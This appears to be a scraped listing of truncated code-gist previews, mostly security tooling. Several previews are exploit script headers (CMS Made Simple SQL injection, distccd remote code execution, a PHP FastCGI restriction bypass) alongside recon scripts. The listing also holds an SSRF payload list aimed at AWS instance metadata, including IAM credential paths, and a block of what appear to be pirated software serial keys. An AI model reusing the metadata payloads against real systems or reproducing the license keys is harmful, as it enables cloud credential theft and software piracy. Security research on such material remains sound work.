clubby789

#!/usr/bin/python3
# Ported to Python from https://gist.github.com/wofeiwo/4f41381a388accbf91f8
# Only implements packet generation, not sending/receiving
import base64
class FCGIClient:
    def __init__(self):
        self.VERSION_1            = 1;
        self.BEGIN_REQUEST        = 1;
        self.ABORT_REQUEST        = 2;
        self.END_REQUEST          = 3;

Babo96

#!/usr/bin/env python
# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9
# Date: 30-03-2019
# Exploit Author: Daniele Scanu @ Certimeter Group
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
# Version: <= 2.2.9
# Tested on: Ubuntu 18.04 LTS
# CVE : CVE-2019-9053

ZEROF

Hi folks,

For some time now there is an issue for all people running VMWARE Workstation (i think even player) with vmmon and vmnet kernel modules. When you start Workstation you will get message "Before you can run VMWare, several modules must be compiled and loaded into the running kernel". You will try to click on install, but in the end you will get an error message with path to error log file.

I'm running kernel 5.4 because this version is fixing few hardware issues I have with "modern hardware" on my laptop.

DarkCoderSc

# -*- coding: utf-8 -*-

'''
	distccd v1 RCE (CVE-2004-2687)
	
	This exploit is ported from a public Metasploit exploit code :
		https://www.exploit-db.com/exploits/9915

	The goal of that script is to avoid using Metasploit and to do it manually. (OSCP style)

gopalindians

Serial Keys:

FU512-2DG1H-M85QZ-U7Z5T-PY8ZD
CU3MA-2LG1N-48EGQ-9GNGZ-QG0UD
GV7N2-DQZ00-4897Y-27ZNX-NV0TD
YZ718-4REEQ-08DHQ-JNYQC-ZQRD0
GZ3N0-6CX0L-H80UP-FPM59-NKAD4
YY31H-6EYEJ-480VZ-VXXZC-QF2E0
ZG51K-25FE1-H81ZP-95XGT-WV2C0
VG30H-2AX11-H88FQ-CQXGZ-M6AY4

jgamblin

#!/bin/bash
#Script to Scan All Sites Found With A Simple NMAP Scan With Burp.

sites=$(nmap "$1" --open 443 --resolve-all --open -oG - | awk 'NR!=1 && /open/{print $2}')

for site in $sites
do
curl -vgw "\\n" 'http://127.0.0.1:1337/v0.1/scan' -d '{"urls":["'"$site"'"]}'  > /dev/null 2>&1
printf "Scanning %s with burp.\\n" "$site"
done

rootxharsh

alias reconme='function frecon()
{
         mkdir $1
         $HOME/./gowitness --chrome-path=/usr/bin/google-chrome file --source=$HOME/aquatone/$1/urls.txt -d $1/ -$
         $HOME/./gowitness --chrome-path=/usr/bin/google-chrome -D /var/www/html/recon/$1/.gowitness-$1.db gene$
         mv report.html $1/report-$1.html
         sed -i -e 's%var\/www\/html\/%%g' $1/report-$1.html
         chown -R www-data:www-data /var/www/html/recon
         touch /var/www/html/recon/$1/index.html

jhaddix

## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories

http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key

wofeiwo

<?php
/**
 * PHP 5.3.3+ FASTCGI jailbreak
 *
 * @author      wofeiwo <wofeiwo#80sec.com>
 * @date        2013-01-23 
 * @version     1.0
 * @reference   https://bugs.php.net/bug.php?id=64103 
 * @reference   http://www.wooyun.org/bugs/wooyun-2013-018116 (Chinese)
 * @note        disable php security settings, but can't overwrite disable_function/disable_classes.